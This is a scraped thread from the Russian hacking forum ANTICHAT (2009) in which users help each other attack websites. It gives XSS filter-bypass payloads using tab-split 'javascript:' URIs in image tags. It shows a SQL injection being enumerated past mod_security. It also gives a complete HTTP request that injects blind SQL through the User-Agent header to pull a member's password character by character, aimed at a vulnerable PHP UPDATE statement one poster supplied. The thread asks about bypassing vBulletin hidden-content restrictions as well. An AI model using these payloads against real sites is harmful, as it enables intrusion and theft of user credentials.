ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.04.2009, 19:56
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
Сообщение от mr.Cupper
1) <script> эти сайты фильтруют
2) < scr ip t > тут табуляция а не пробелы, и вроде браузер должен все нормально интерпретировать (хотя кажеться там были и пробелы тоже щас попробую только с табуляцияе).
Да блин, че за нах, во всех статьях про xss говориться что мол если фильтруеться то используйте табуляции, пробелы, регистры букв, притом у меня есть живой пример где
[img]javascript:alert('На_сайте_обнаруже на_XSS_уязвимость');[/img]
неработает, а
[img]jav ascript:alert('На_сайте_обнаружен _XSS_уязвимость');[/img] (сдесь табуляция)
работает
че за нах (((.
Ну предположим все что я сказал выше чушь собачья, тогда если сайт фильтрует текст <script> нече сделать больше и неполучиться ? низрена не так ! вот _http://ha.ckers.org/xss.html да и на всех статьях на форуме подобной описываеться !!!!
так в чем всетаки проблема ?(
Код:
<IMG SRC="jav[TAB]ascript:alert('XSS');">
и это всеже совершенно разные вещи - в первом случае ты TAB вставляешь в атрибут тега, а во втором - в имя тега. Любой нормальный браузер вообще не будет это интерпретировать как тег.
|
|
|
25.04.2009, 19:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
diznt, тогда меняй сканер )
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
26.04.2009, 02:06
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 3
Провел на форуме:
22054
Репутация:
0
|
|
Доброго времени суток Товарищи.Имеется инъекция в которой выводятся база юзер и версия но при попытке вывода таблиц из INFORMATION_SCHEMA появляется ошибка Not Acceptable
An appropriate representation of the requested resource /sex.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache Server at www.site.com Port 80
Кто нибудь сталкивался с этим?
|
|
|
|
26.04.2009, 02:11
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Grookle сылку в студию
посмотрим что у вас там
так просто нельзя что нибуть сказать
|
|
|
|
26.04.2009, 02:17
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 3
Провел на форуме:
22054
Репутация:
0
|
|
Skinul v LS
|
|
|
|
26.04.2009, 11:33
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Grookle, mod_security мещает. пробуй разные запросы
|
|
|
|
26.04.2009, 12:08
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Grookle линк в студию...
|
|
|
|
26.04.2009, 16:59
|
|
Новичок
Регистрация: 26.03.2009
Сообщений: 25
Провел на форуме:
49768
Репутация:
0
|
|
как можно обойти HIDE в темах Vbulletin...??
|
|
|
|
26.04.2009, 20:48
|
|
Новичок
Регистрация: 02.02.2009
Сообщений: 19
Провел на форуме:
278694
Репутация:
9
|
|
Можно ли здесь чёта провернуть:
$update = mysql_query("UPDATE `chat_users` SET `time` = '".$online."', `place` = 0, `ip` = '".getenv('REMOTE_ADDR')."', `ua` = '".htmlspecialchars(getenv('HTTP_USER_AGENT')). "' WHERE `id` = '".$id."';");
если вставить свой код в HTTP_USER_AGENT? И если да то какой код надо? Заранее спс за ответ
|
|
|
|
26.04.2009, 22:18
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от AngelOfFaith
если вставить свой код в HTTP_USER_AGENT?
Ну да. бенчмарк можно заюзать или мор1ров. Будет что-то вроде такого пакета
GET /script.php HTTP/1.1
Host: site.com
User-Agent: 1' and 1=(select null from members where length(if(ascii(substring((select pass from members where id=1),1,1))>1,pass,id))>1)/*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Keep-Alive: 300
Connection: keep-alive
Сообщение от AngelOfFaith
И если да то какой код надо?
А это тебе виднее. Чего ты хочешь добиться то от инъекции ?
Рекомендую почитать http://forum.antichat.ru/thread35207.html
Сообщение от n1ceque
как можно обойти HIDE в темах Vbulletin...??
https://forum.antichat.ru/showthread.php?t=26987
С тех пор ничего не изменилось =)
Я надеюсь ты не на нулледе хайды хенкать хоч ?)) А то люди значит постят, стараются, работают на коллективное благо так сказать, а ты на все готовенькое хочешь ? Не хорошо, товарищ, не хорошо
Последний раз редактировалось ElteRUS; 26.04.2009 в 22:23..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
